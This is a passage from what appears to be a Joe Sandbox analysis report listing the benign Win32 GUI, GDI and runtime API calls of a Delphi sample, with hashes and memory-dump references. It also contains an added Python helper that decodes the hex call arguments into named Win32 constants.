                                                                                                    • Opcode ID: 74046fb7291a68ed8cb1e0ace04cb32076ade0769b4b13a4eac8d54a33a2d8a7
                                                                                                    • Instruction ID: ec40ec7147b8ff34ce03f0469c275ff43f1551061ed26ff462a4895ea3bb860a
                                                                                                    • Opcode Fuzzy Hash: 74046fb7291a68ed8cb1e0ace04cb32076ade0769b4b13a4eac8d54a33a2d8a7
                                                                                                    • Instruction Fuzzy Hash: 70115EBA1283006AD200F7A8CC85FDF77FC9B55780F404A19B754DB1D1DAB1E9848772
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
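The API reference lines in the blocks above are Joe Sandbox's per-function call listings, and the raw hex arguments hide what each call actually does: 00000030 passed to SystemParametersInfoA is SPI_GETWORKAREA, 00000084 and 00000020 passed to SendMessageA are WM_NCHITTEST and WM_SETCURSOR, and 00002010 passed to MessageBoxA is MB_ICONERROR|MB_TASKMODAL. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in that listing format (including the "Part of subcall function" form) and resolves the constants for the APIs that appear in these blocks. The sample input is copied from the screen-metrics, cursor hit-test and error-reporting listings above. The constant tables are documented Win32 values; the one assumption is that the report renders GetStdHandle's DWORD(-12) argument truncated to a single byte (000000F4), which the decoder accepts alongside the full 32-bit form.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed sample: API reference lines copied from the listings above.
SAMPLE = """\
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB1E8
• GetSystemMetrics.USER32(00000000), ref: 032DB1FD
• GetSystemMetrics.USER32(00000001), ref: 032DB208
• lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB232
  • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
• SendMessageA.USER32(00000000,00000084,00000000,?), ref: 03301D06
• SendMessageA.USER32(00000000,00000020,00000000,?), ref: 03301D18
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 032BC018
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 032BC071
• GetCursorPos.USER32 ref: 03301CBB
"""

# One listing line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDR". GetCursorPos shows the no-argument form.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw tokens: 8-digit hex, "?" (unresolved) or a literal
    ref: str                 # address of the call site
    subcall_of: Optional[str] = None


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub"))


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def _table(names: Dict[int, str]) -> Callable[[int], Optional[str]]:
    return lambda v: names.get(v)


def _flags(names: Dict[int, str]) -> Callable[[int], Optional[str]]:
    # Decode a bitmask into known flag names; leftover bits are kept as hex.
    def decode(v: int) -> Optional[str]:
        known = 0
        for bit in names:
            known |= bit
        parts = [n for bit, n in sorted(names.items()) if v & bit]
        if v & ~known:
            parts.append(f"0x{v & ~known:X}")
        return "|".join(parts) or None
    return decode


def _std_handle(v: int) -> Optional[str]:
    # STD_*_HANDLE are DWORD(-10/-11/-12). Assumption: the report prints them
    # truncated to one byte (000000F4), so accept both renderings.
    if (v >> 8) not in (0, 0xFFFFFF):
        return None
    return {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE", 0xF4: "STD_ERROR_HANDLE"}.get(v & 0xFF)


# (API name, zero-based argument index) -> decoder for that argument.
DECODERS: Dict[tuple, Callable[[int], Optional[str]]] = {
    ("SystemParametersInfoA", 0): _table({0x30: "SPI_GETWORKAREA"}),
    ("GetSystemMetrics", 0): _table({0: "SM_CXSCREEN", 1: "SM_CYSCREEN"}),
    ("SendMessageA", 1): _table({0x20: "WM_SETCURSOR", 0x84: "WM_NCHITTEST"}),
    ("MessageBoxA", 3): _flags({0x10: "MB_ICONERROR", 0x2000: "MB_TASKMODAL"}),
    ("GetStdHandle", 0): _std_handle,
    ("SafeArrayCreate", 0): _table({0xC: "VT_VARIANT"}),
    ("VirtualQuery", 2): _table({0x1C: "sizeof(MEMORY_BASIC_INFORMATION)"}),
}


def decode_args(call: ApiCall) -> List[str]:
    out = []
    for i, a in enumerate(call.args):
        if HEX8.fullmatch(a):
            v = int(a, 16)
            dec = DECODERS.get((call.api, i))
            name = dec(v) if dec else None
            out.append(name or (str(v) if v < 0x100 else f"0x{v:X}"))
        else:
            out.append(a)  # "?" or a literal such as DISPLAY
    return out


def annotate(call: ApiCall) -> str:
    via = f"(via sub_{call.subcall_of}) " if call.subcall_of else ""
    return f"{call.ref} {via}{call.api}.{call.module}({', '.join(decode_args(call))})"


if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        print(annotate(c))
```

Running the block prints one annotated line per call; extending it to a new report means adding rows to DECODERS for the APIs and argument positions you care about, which is where the real triage value lies (a GetStdHandle/WriteFile/MessageBoxA sequence reads very differently once the handle and the MB_ flags are named).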

                                                                                                    APIs
                                                                                                    • FillRect.USER32(?,?), ref: 032FCAFD
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 032FCB28
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032FCB47
                                                                                                      • Part of subcall function 032FC9F8: CallWindowProcA.USER32(?,?,?,?,?), ref: 032FCA32
                                                                                                    • BeginPaint.USER32(?,?), ref: 032FCBBF
                                                                                                    • GetWindowRect.USER32(?,?), ref: 032FCBEC
                                                                                                    • EndPaint.USER32(?,?,032FCC60), ref: 032FCC4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 901200654-0
                                                                                                    • Opcode ID: efd01d8176d7a0ff4bb95a7288e37b286c5bc9cf3b031c3dd43cee9834525993
                                                                                                    • Instruction ID: 01342145df41e5eed349d52c1353e024a2cc53e76effc608c8f69c7470044e77
                                                                                                    • Opcode Fuzzy Hash: efd01d8176d7a0ff4bb95a7288e37b286c5bc9cf3b031c3dd43cee9834525993
                                                                                                    • Instruction Fuzzy Hash: 3A51E479A2420DEFCB10EFA8C588E9DF7F8AF08710F1581A5E508EB251C774AA85DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032BF991
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032BF9AD
                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 032BF9E6
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032BFA63
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 032BFA7C
                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 032BFAB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 351091851-0
                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction ID: 476c448e660474ad88534672072dba9c1f632b1a46d2294bbd4b303a84928243
                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction Fuzzy Hash: B551ED7991062AABCB26DB58DD90BD9B3FCAF08340F0441D5EA49EB211D674AFC48F61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6FE
                                                                                                      • Part of subcall function 032CD6BC: ResetEvent.KERNEL32(00000288,032CD739), ref: 032CD6C2
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC), ref: 032CD743
                                                                                                    • InterlockedExchange.KERNEL32(0331AAF0,?), ref: 032CD75F
                                                                                                    • LeaveCriticalSection.KERNEL32(033302EC,00000000,032CD88A,?,00000000,032CD8A9,?,033302EC), ref: 032CD7B8
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC,032CD834,032CD88A,?,00000000,032CD8A9,?,033302EC), ref: 032CD827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
• String ID:
• API String ID: 2189153385-0
• Opcode ID: 94e5daeb57e323866707f8d4f0bf9d12095b8259dae3c6719b22ce6372b2c08e
• Instruction ID: e6b10bacf944d582e31e0c0d9937775e711749c2c38ecce33fcc489e28c3c7d8
• Instruction Fuzzy Hash: D731F234A34784AFDB11EFA9DC90A6DB7F8EB09700F5586B8E400DA621D7B55881CB21
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 032D3FB2
• GetSystemMetrics.USER32(0000000C), ref: 032D3FBE
• GetDC.USER32(00000000), ref: 032D3FDA
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D4001
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D400E
• ReleaseDC.USER32(00000000,00000000), ref: 032D4047
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
• Opcode ID: 0e7975f63dd0fa00b2479d7cbbd113b45ea15a78a49f728db61c039cf49da8fb
• Instruction ID: ea7bd71e46c3c9d253f21891747d5e38d5a314517af0950632071c04c7026a3f
• Instruction Fuzzy Hash: DD315078A10349EFDB14EFA5C880AADBBB5FF89350F148565E918AF780C6719D80CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 032D4270: GetObjectA.GDI32(?,00000054), ref: 032D4284
• CreateCompatibleDC.GDI32(00000000), ref: 032D43E6
• SelectPalette.GDI32(?,?,00000000), ref: 032D4407
• RealizePalette.GDI32(?), ref: 032D4413
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 032D442A
• SelectPalette.GDI32(?,00000000,00000000), ref: 032D4452
• DeleteDC.GDI32(?), ref: 032D445B
Similarity
• API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
• String ID:
• API String ID: 1221726059-0
• Opcode ID: 8dc6e3218ec3d95a9795c989c6361f6e4e6d313ececc3eaeb10856c2c75f9401
• Instruction ID: e8c7eff6a8d963586951495b21706d6bae9082094bd3de1274c06f2c41f73d06
• Instruction Fuzzy Hash: DF114F79A143047FDB10EBE9CC85F9EB7FCEB48740F5584A4B524EB680DAB499808764
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateCompatibleDC.GDI32(00000000), ref: 032D3C29
• SelectObject.GDI32(00000000,00000000), ref: 032D3C32
• GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,032D61AF,?,?,?,?,032D4D27), ref: 032D3C46
• SelectObject.GDI32(00000000,00000000), ref: 032D3C52
• DeleteDC.GDI32(00000000), ref: 032D3C58
• CreatePalette.GDI32 ref: 032D3C9F
Similarity
• API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
• String ID:
• API String ID: 2515223848-0
• Opcode ID: 06dcec53ca48781ffa93735ac4e44d2594361444003ffa06598b8e97dd5d723a
• Instruction ID: c84ac9686e29fe21f2739ad8dc2c9cf65a4fccc03f0df12697470554dada64d9
• Instruction Fuzzy Hash: 0601966A72430166D614E765CC46BAB72B89FC0790F19C819B6849F281E6B8C8848397
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 032D2AC0: CreateBrushIndirect.GDI32(?), ref: 032D2B6B
• UnrealizeObject.GDI32(00000000), ref: 032D3304
• SelectObject.GDI32(?,00000000), ref: 032D3316
• SetBkColor.GDI32(?,00000000), ref: 032D3339
• SetBkMode.GDI32(?,00000002), ref: 032D3344
• SetBkColor.GDI32(?,00000000), ref: 032D335F
• SetBkMode.GDI32(?,00000001), ref: 032D336A
  • Part of subcall function 032D1D04: GetSysColor.USER32(?), ref: 032D1D0E
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 26b5bad37964a99be44aea8d5021ac51d4fdb6d7253912d4b1c6f075e744b768
• Instruction ID: 3e2f78cd72d9d224c38ac9ffbe7c6e9245e122ce4ba6ed0305ff1051c7dd880c
• Instruction Fuzzy Hash: 41F039BD620302ABDE54FFB8D9C5E4B77ACAF082457044490B904DF556CAE5E8909731
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B36F2
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,032B3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B3725
• RegCloseKey.ADVAPI32(?,032B3748,00000000,?,00000004,00000000,032B3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B373B
Strings
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: f2d47bddf579ab65963322c3324eb2db3f4aa9a4991b205470bb5f1188d17c44
• Instruction ID: 338e5e97f50a8b3651324075a71d5bea33b814edf13473b95e5e2c8b3619deeb
• Instruction Fuzzy Hash: 6E01B5BD960358BEDB11EB90CD42BFD73FCDB08B51F5000A2BB00D6981E6796550DB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(00000000,00000060,00000000), ref: 032FBC23
• MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBCB2
• MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBCE1
• MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBD10
• MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBD33
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 01e474a40ccc64a248e28924046ae9f7e049ee45dca20aef141c3d57fca7df9e
• Instruction ID: ac58d094c9d8f2b692dcf9a50470b2691f3e76e576fc8c6d41f3e980b081ebea
• Instruction Fuzzy Hash: FD819774A10205EFDB44DB98C589EADB7F9AF49300F6941F5A908EB365CB70AE80DB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenu.USER32(00000000), ref: 032FD818
• SetMenu.USER32(00000000,00000000), ref: 032FD835
• SetMenu.USER32(00000000,00000000), ref: 032FD86A
• SetMenu.USER32(00000000,00000000), ref: 032FD886
  • Part of subcall function 032B669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 032B66CE
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 032FD8CD
Similarity
• API ID: Menu$LoadStringWindow
• String ID:
• API String ID: 1738039741-0
• Opcode ID: 5a136c835533ec95ca29242527e2464f9efc67a111beee8b38f3baeae9b4f7ec
• Instruction ID: 23c1797e5ed372b324123e8c017dd9f03d439c9ad7e029e5e9bc04f8d3f83d41
• Instruction Fuzzy Hash: 88519238A243054FDB25FB389894B9AF7986F45304F0845B5EE45DF29ACBB4D8C68750
Uniqueness
Uniqueness Score: -1.00%

APIs
• DrawEdge.USER32(00000000,?,00000006,00000002), ref: 032E0017
• OffsetRect.USER32(?,00000001,00000001), ref: 032E0068
• DrawTextA.USER32(00000000,00000000,?,?,?), ref: 032E00A1
• OffsetRect.USER32(?,000000FF,000000FF), ref: 032E00AE
• DrawTextA.USER32(00000000,00000000,?,?,?), ref: 032E0119
Similarity
• API ID: Draw$OffsetRectText$Edge
• String ID:
• API String ID: 3610532707-0
• Opcode ID: e757d04a822caaa49cb36ddf028efddfff750dd52677a383080a799048d94db4
• Instruction ID: 94a24ad468cf4a623ac833bfc817e7fdb081ab7133853da0d4fdb600a8159575
• Instruction Fuzzy Hash: CB51A479A20309AFDF10EBA9C981B9EB7B9AF05710F588191F910AF291C7B4EDC18750
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 032E7FA0: WindowFromPoint.USER32(-000000F7,?,00000000,032E7B72,?,-00000010,?), ref: 032E7FA6
                                                                                                      • Part of subcall function 032E7FA0: GetParent.USER32(00000000), ref: 032E7FBD
                                                                                                    • GetWindow.USER32(00000000,00000004), ref: 032E7B7A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032E7C4E
                                                                                                    • EnumThreadWindows.USER32(00000000,032E7AEC,?), ref: 032E7C54
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032E7C6B
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032E7CD9
                                                                                                      • Part of subcall function 032E6FE0: GetWindowThreadProcessId.USER32(?), ref: 032E6FED
                                                                                                      • Part of subcall function 032E6FE0: GetCurrentProcessId.KERNEL32(?,00000000,?,032E3C51,?,032E2D0D), ref: 032E6FF6
                                                                                                      • Part of subcall function 032E6FE0: GlobalFindAtomA.KERNEL32(00000000), ref: 032E700B
                                                                                                      • Part of subcall function 032E6FE0: GetPropA.USER32(?,00000000), ref: 032E7022
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2202917067-0
                                                                                                    • Opcode ID: 51660f54f7ad4f16234a5317dc64bb31ac3d24b7e0f3f18430b1337d119c80b4
                                                                                                    • Instruction ID: 19df3fe17c29d70ffbb8f04b773875b592484372747542dfb22677df772606ce
                                                                                                    • Opcode Fuzzy Hash: 51660f54f7ad4f16234a5317dc64bb31ac3d24b7e0f3f18430b1337d119c80b4
                                                                                                    • Instruction Fuzzy Hash: F8516C75A202199FCB10EF6CC485AEEB7F8BF08350F5481A5E919EB355D770E981CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(00000000,?), ref: 032EF937
                                                                                                    • SaveDC.GDI32(00000000), ref: 032EF970
                                                                                                    • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,032EFA2E,?,00000000), ref: 032EF9F2
                                                                                                    • RestoreDC.GDI32(00000000,?), ref: 032EFA28
                                                                                                    • EndPaint.USER32(00000000,?,032EFA72), ref: 032EFA65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808407030-0
                                                                                                    • Opcode ID: 8372e59c3d5c56b9b07066363d5598baedd96c0a02956287160785457c0534b0
                                                                                                    • Instruction ID: cc5a0facd28d1d914f2881d8a4750cbea8c84df07f09c9650495c1068e361efc
                                                                                                    • Opcode Fuzzy Hash: 8372e59c3d5c56b9b07066363d5598baedd96c0a02956287160785457c0534b0
                                                                                                    • Instruction Fuzzy Hash: 9B41A175A14249AFDB04DFA8C955FAEBBF8FF08704F5A41A8E9049B361D774AD81CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a62f9c0dba7c30d88d0bbd9bb0ab53a78bbb830797eea9b810b751a8907ca16f
                                                                                                    • Instruction ID: ec379136cadbc54b656414647d5e5981105fe077acf8b47fdee29224bd324b13
                                                                                                    • Opcode Fuzzy Hash: a62f9c0dba7c30d88d0bbd9bb0ab53a78bbb830797eea9b810b751a8907ca16f
                                                                                                    • Instruction Fuzzy Hash: 3A118436B713567ADB60EA398E04B9A76985F45B44F084455BD03DF347CAA8C8C582D8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D61BA
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2404249990-0
                                                                                                    • Opcode ID: a676d732ea28a78a5ffeab0e86a7dbc8e63a2c430c0596e67ed0b586c7f56290
                                                                                                    • Instruction ID: 4f3fa6bf07947d025be8c78f042cd08ccaef2fab94ac2cc5f480a56b14f0c49b
                                                                                                    • Opcode Fuzzy Hash: a676d732ea28a78a5ffeab0e86a7dbc8e63a2c430c0596e67ed0b586c7f56290
                                                                                                    • Instruction Fuzzy Hash: D011B2256653AA9EDB24EF24C844BEE3BA5AF51791F480161F8409F6C1D7F8C8D4C3A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 03300E84
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 03300EB6
                                                                                                    • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,032FE5B4), ref: 03300EEF
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 03300F08
                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,032FE5B4), ref: 03300F1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayeredRedraw
                                                                                                    • String ID:
                                                                                                    • API String ID: 1758778077-0
                                                                                                    • Opcode ID: 09a0eb2e90d0940743469b14d29b62871de0e21f44c11d650bcace88f7e3990f
                                                                                                    • Instruction ID: 3d2aa2c5d11aef641389a9d662e56c9b7015354b34e9df38f7bc3f92c9be7e80
                                                                                                    • Opcode Fuzzy Hash: 09a0eb2e90d0940743469b14d29b62871de0e21f44c11d650bcace88f7e3990f
                                                                                                    • Instruction Fuzzy Hash: CE11C665A187905ACF25FB784CE4B966B9C0F45311F0C06B5BA99EE2C7C7ECC588CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D3B90
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 032D3BAC
                                                                                                    • GetPaletteEntries.GDI32(8A080D4D,00000000,00000008,?), ref: 032D3BC4
                                                                                                    • GetPaletteEntries.GDI32(8A080D4D,00000008,00000008,?), ref: 032D3BDC
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D3BF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPalette$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3128150645-0
                                                                                                    • Opcode ID: dff730e50a37138b46365172f4948773fbdfb32ddafa947573f435f1269dc94e
                                                                                                    • Instruction ID: 21a530a481e0779daa9ca647fd98e2dc05c28c92f4ad616b8984e03065263a6c
                                                                                                    • Opcode Fuzzy Hash: dff730e50a37138b46365172f4948773fbdfb32ddafa947573f435f1269dc94e
                                                                                                    • Instruction Fuzzy Hash: 651104356583087FEB44DAA4CC81FAD7BFCF704710F408095F614DA5C1DAB694848722
